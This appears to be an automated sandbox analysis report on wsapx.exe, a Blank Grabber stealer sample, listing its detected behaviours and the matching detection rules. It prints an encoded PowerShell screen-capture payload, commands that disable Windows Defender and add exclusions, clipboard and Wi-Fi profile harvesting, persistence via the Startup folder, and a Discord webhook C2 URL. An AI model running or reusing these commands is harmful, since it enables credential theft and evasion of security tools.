JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7776, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\wsapx.exe'", ProcessId: 7508, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\wsapx.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\bALb7.zip" *, ProcessId: 2196, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7516, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 7664, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3200, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\wsapx.exe", ParentImage: C:\Users\user\Desktop\wsapx.exe, ParentProcessId: 7432, ParentProcessName: wsapx.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 2896, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: wsapx.exe.7432.2.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG"}
              Source: wsapx.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5D901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,110_2_00007FF60E5D901C
              Source: wsapx.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: wsapx.exe, 00000002.00000002.2671964478.00007FFDA5491000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: wsapx.exe, 00000002.00000002.2668800317.00007FFD9472F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: wsapx.exe, 00000002.00000002.2670829170.00007FFDA34C1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: wsapx.exe, 00000002.00000002.2672233882.00007FFDA57F7000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: wsapx.exe, wsapx.exe, 00000002.00000002.2666718070.00007FFD93C42000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdb source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: wsapx.exe, 00000002.00000002.2671564113.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: wsapx.exe, 00000002.00000002.2670568428.00007FFDA346C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: wsapx.exe, 00000002.00000002.2671361825.00007FFDA46D1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: wsapx.exe, 00000000.00000003.2148160549.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2673030772.00007FFDAC071000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: wsapx.exe, wsapx.exe, 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: wsapx.exe, 00000002.00000002.2671081584.00007FFDA4331000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: wsapx.exe, 00000002.00000002.2670348004.00007FFDA3421000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: wsapx.exe, 00000002.00000002.2669708015.00007FFDA3395000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.pdbhP source: powershell.exe, 00000041.00000002.2442904993.000001FAD38A5000.00000004.00000800.00020000.00000000.sdmp
